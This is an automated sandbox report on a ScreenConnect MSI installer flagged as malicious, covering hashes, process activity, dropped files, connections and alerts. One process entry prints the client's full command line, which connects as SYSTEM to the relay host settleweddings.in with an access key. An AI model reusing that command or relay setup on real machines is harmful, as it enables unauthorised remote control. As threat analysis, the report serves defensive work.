File name:

ea330d901669c5b2bbd27c6252c3ed6a6c3694f5ee4b2c55371de2ed872e1a56.msi

Full analysis: https://app.any.run/tasks/972048c1-14ae-46fe-82dc-0f13316bfa85
Verdict: Malicious activity
Analysis date: November 10, 2024, 17:53:06
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
generated-doc
remote
screenconnect
Indicators:
MIME: application/x-msi
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision Number: {1A6C5EE4-2F77-40E7-9DD9-8EBE0CA46107}, Create Time/Date: Wed Feb 21 19:39:02 2024, Last Saved Time/Date: Wed Feb 21 19:39:02 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701), Security: 2
MD5:

1E7FBAEBF26C173BD25E09C110CC46FC

SHA1:

5873EF0771DA9E0DFF1F1FA93D01B77EFB8A9EB8

SHA256:

EA330D901669C5B2BBD27C6252C3ED6A6C3694F5EE4B2C55371DE2ED872E1A56

SSDEEP:

98304:NiG+CeXyEMWISBYFxi5Xmad5SqKGaCH+e7eSnOmcQVbcAhS9/9U7w/2D3861JBIK:bf04wU/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Executes as Windows Service

      • VSSVC.exe (PID: 5068)
      • ScreenConnect.ClientService.exe (PID: 4128)

    • Executable content was dropped or overwritten

      • rundll32.exe (PID: 5004)

  • INFO

    • Checks supported languages

      • msiexec.exe (PID: 5284)
      • msiexec.exe (PID: 3844)

    • An automatically generated document

      • msiexec.exe (PID: 5748)

    • Create files in a temporary directory

      • rundll32.exe (PID: 5004)

    • Reads the computer name

      • msiexec.exe (PID: 3844)
      • msiexec.exe (PID: 5284)

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 5748)
      • msiexec.exe (PID: 5284)

    • Manages system restore points

      • SrTasks.exe (PID: 944)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.msi | Microsoft Windows Installer (98.5)
.msi | Microsoft Installer (100)

EXIF

FlashPix

CodePage: Windows Latin 1 (Western European)
Title: Installation Database
Subject: Default
Author: ScreenConnect Software
Keywords: Default
Comments: Default
Template: Intel;1033
RevisionNumber: {1A6C5EE4-2F77-40E7-9DD9-8EBE0CA46107}
CreateDate: 2024:02:21 19:39:02
ModifyDate: 2024:02:21 19:39:02
Pages: 200
Words: 2
Software: Windows Installer XML Toolset (3.11.0.1701)
Security: Read-only recommended
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
139
Monitored processes
12
Malicious processes
0
Suspicious processes
0

Behavior graph

Click at the process to see the details
start msiexec.exe msiexec.exe msiexec.exe no specs rundll32.exe vssvc.exe no specs srtasks.exe no specs conhost.exe no specs msiexec.exe no specs msiexec.exe no specs screenconnect.clientservice.exe no specs screenconnect.windowsclient.exe no specs screenconnect.windowsclient.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
944C:\WINDOWS\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:11C:\Windows\System32\SrTasks.exemsiexec.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft® Windows System Protection background tasks.
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
1452"C:\Program Files (x86)\ScreenConnect Client (b61627138138a03e)\ScreenConnect.WindowsClient.exe" "RunRole" "525b3672-7f63-42f2-84e3-7b06615e8b41" "System"C:\Program Files (x86)\ScreenConnect Client (b61627138138a03e)\ScreenConnect.WindowsClient.exeScreenConnect.ClientService.exe
User:
SYSTEM
Company:
ScreenConnect Software
Integrity Level:
SYSTEM
Description:
ScreenConnect Client
Exit code:
0
Version:
23.9.10.8817
2724C:\Windows\syswow64\MsiExec.exe -Embedding 7D9BAF9B86EEE329D05DFBDC21DD8836C:\Windows\SysWOW64\msiexec.exemsiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.19041.3636 (WinBuild.160101.0800)
3004\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeSrTasks.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
3844C:\Windows\syswow64\MsiExec.exe -Embedding 16ECEE08FD756953CB59E15B25A7598F CC:\Windows\SysWOW64\msiexec.exemsiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\aclayers.dll
3912C:\Windows\syswow64\MsiExec.exe -Embedding AE348D4ED3C3B7F9300135B9CCEF4336 E Global\MSI0000C:\Windows\SysWOW64\msiexec.exemsiexec.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Exit code:
0
Version:
5.0.19041.3636 (WinBuild.160101.0800)
4128"C:\Program Files (x86)\ScreenConnect Client (b61627138138a03e)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=settleweddings.in&p=8041&s=60a0ebd2-7aa6-4fe0-a597-a609dbec19a3&k=BgIAAACkAABSU0ExAAgAAAEAAQARwlCbNekqtvn7ehBbVwdj7uvzavA8rmmmr3yj7MR0sbp1gpODtITSSp2yopf%2ba7WKdfYEX%2fyTe6B0w%2birgqpxQHxW0KLJJ9dnyhCmBc0kgbG0vIPUmrbaML2HQr0t7mn269V%2b%2bWn87tuotq4VeGoagOdEWUVVZaGSEJ94nqZqGkrTz0RPCJC2SBT%2boKzc%2fKQO5wG%2fJpqFDDBxFZQwAzq31LnTDb6A3I3SoWMZBbyw1AOrfJaDaz8unfrictd01UIWxSfjfeZJdHg01pQ1qsSttdhfmQZCMI9%2fl6zudjwuJ52f7zCQREbAV%2bmhryBoYftW5MO08DWgvKvVv%2bp776bN&c=latest&c=&c=&c=&c=&c=&c=&c="C:\Program Files (x86)\ScreenConnect Client (b61627138138a03e)\ScreenConnect.ClientService.exeservices.exe
User:
SYSTEM
Integrity Level:
SYSTEM
Version:
23.9.10.8817
5004rundll32.exe "C:\Users\admin\AppData\Local\Temp\MSICB48.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_576468 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArgumentsC:\Windows\SysWOW64\rundll32.exe
msiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\aclayers.dll
5068C:\WINDOWS\system32\vssvc.exeC:\Windows\System32\VSSVC.exeservices.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft® Volume Shadow Copy Service
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\vssvc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5284C:\WINDOWS\system32\msiexec.exe /VC:\Windows\System32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
Total events
1 320
Read events
1 287
Write events
24
Delete events
9

Modification events

(PID) Process:(5284) msiexec.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SystemRestore
Operation:writeName:SrCreateRp (Enter)
Value:
480000000000000007416D6E9933DB01A41400009C150000D50700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:(5284) msiexec.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SPP
Operation:writeName:SppGetSnapshots (Enter)
Value:
480000000000000007416D6E9933DB01A41400009C150000D20700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:(5284) msiexec.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SPP
Operation:writeName:SppGetSnapshots (Leave)
Value:
4800000000000000222BB76E9933DB01A41400009C150000D20700000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:(5284) msiexec.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SPP
Operation:writeName:SppEnumGroups (Enter)
Value:
4800000000000000222BB76E9933DB01A41400009C150000D10700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:(5284) msiexec.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SPP
Operation:writeName:SppEnumGroups (Leave)
Value:
480000000000000085F3BB6E9933DB01A41400009C150000D10700000100000000000000010000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:(5284) msiexec.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SPP
Operation:writeName:SppCreate (Enter)
Value:
48000000000000003DBCC06E9933DB01A41400009C150000D00700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:(5284) msiexec.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SPP
Operation:writeName:LastIndex
Value:
11
(PID) Process:(5284) msiexec.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SPP
Operation:writeName:SppGatherWriterMetadata (Enter)
Value:
4800000000000000B3533A6F9933DB01A41400009C150000D30700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:(5284) msiexec.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\VssapiPublisher
Operation:writeName:IDENTIFY (Enter)
Value:
480000000000000015B93C6F9933DB01A41400000C160000E80300000100000000000000000000005143F142C1DEB9408D5CB3DC52C5B1FF00000000000000000000000000000000
(PID) Process:(5068) VSSVC.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
Operation:writeName:IDENTIFY (Enter)
Value:
4800000000000000B738466F9933DB01CC130000F01B0000E80300000100000001000000000000000000000000000000000000000000000000000000000000000000000000000000
Executable files
16
Suspicious files
22
Text files
9
Unknown types
0

Dropped files

PID
Process
Filename
Type
5284msiexec.exeC:\System Volume Information\SPP\metadata-2
MD5:
SHA256:
5284msiexec.exeC:\Windows\Installer\90989.msi
MD5:
SHA256:
5004rundll32.exeC:\Users\admin\AppData\Local\Temp\MSICB48.tmp-\CustomAction.configxml
MD5:EB99EE012EB63C162EEBC1DF3A15990B
SHA256:C5045C2D482F71215877EB668264EE47E1415792457F19A5A55651C3554CC7CD
5748msiexec.exeC:\Users\admin\AppData\Local\Temp\MSICB48.tmpexecutable
MD5:8D94C9F4C07B76B4E32DAFFCC51109DA
SHA256:2B35C0E4088B2A7728FA7BC6A5BFDEFED7665598DE6D49641FDF5D1F1271A4D7
5004rundll32.exeC:\Users\admin\AppData\Local\Temp\MSICB48.tmp-\Microsoft.Deployment.WindowsInstaller.dllexecutable
MD5:5EF88919012E4A3D8A1E2955DC8C8D81
SHA256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
5004rundll32.exeC:\Users\admin\AppData\Local\Temp\MSICB48.tmp-\ScreenConnect.Core.dllexecutable
MD5:B319407E807BE1A49E366F7F8EA7EE2A
SHA256:761B7E50BAA229E8AFCD9A50990D7F776DDB5ED1EA5FBB131C802E57CF918742
5284msiexec.exeC:\System Volume Information\SPP\snapshot-2binary
MD5:E5D66BF8D82824289B41411AB4AF74A7
SHA256:94782C5D71ECE84AB3574B9183CD9DF6F71EE8EC1665888C0F587E3C1463D3B2
5284msiexec.exeC:\Program Files (x86)\ScreenConnect Client (b61627138138a03e)\ScreenConnect.Client.dllexecutable
MD5:6BC9611D5B6CEE698149A18D986547A8
SHA256:17377A52EEAE11E8EE01EB629D6A60C10015AD2BB8BC9768E5C8E4B6500A15ED
5284msiexec.exeC:\Windows\Installer\inprogressinstallinfo.ipibinary
MD5:5899D1DFD7C7219CD985B4DDFF9BA8FE
SHA256:5A967D67AAD55942093A06E0CF57A9FEF6551BF8346CB5400C89A5CF66288BD9
5284msiexec.exeC:\Windows\Temp\~DF3B72E8AA83EEB519.TMPbinary
MD5:5899D1DFD7C7219CD985B4DDFF9BA8FE
SHA256:5A967D67AAD55942093A06E0CF57A9FEF6551BF8346CB5400C89A5CF66288BD9
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
22
DNS requests
8
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
23.48.23.176:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
23.48.23.176:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
23.48.23.176:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
23.218.209.163:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
23.218.209.163:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
23.218.209.163:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
6944
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
192.168.100.255:137
whitelisted
1588
RUXIMICS.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
192.168.100.255:138
whitelisted
23.48.23.176:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
1588
RUXIMICS.exe
23.48.23.176:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
6944
svchost.exe
23.218.209.163:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
1588
RUXIMICS.exe
23.218.209.163:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
23.218.209.163:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.124.78.146
  • 20.73.194.208
whitelisted
google.com
  • 172.217.23.110
whitelisted
crl.microsoft.com
  • 23.48.23.176
  • 23.48.23.194
  • 23.48.23.143
  • 23.48.23.147
  • 23.48.23.164
whitelisted
www.microsoft.com
  • 23.218.209.163
whitelisted
settleweddings.in
  • 85.31.47.16
unknown
self.events.data.microsoft.com
  • 20.42.65.88
whitelisted

Threats

PID
Process
Class
Message
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 9
Misc activity
ET INFO ScreenConnect/ConnectWise Initial Checkin Packet M2
Potential Corporate Privacy Violation
REMOTE [ANY.RUN] ScreenConnect Server Response
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
ea330d901669c5b2bbd27c6252c3ed6a6c3694f5ee4b2c55371de2ed872e1a56.msi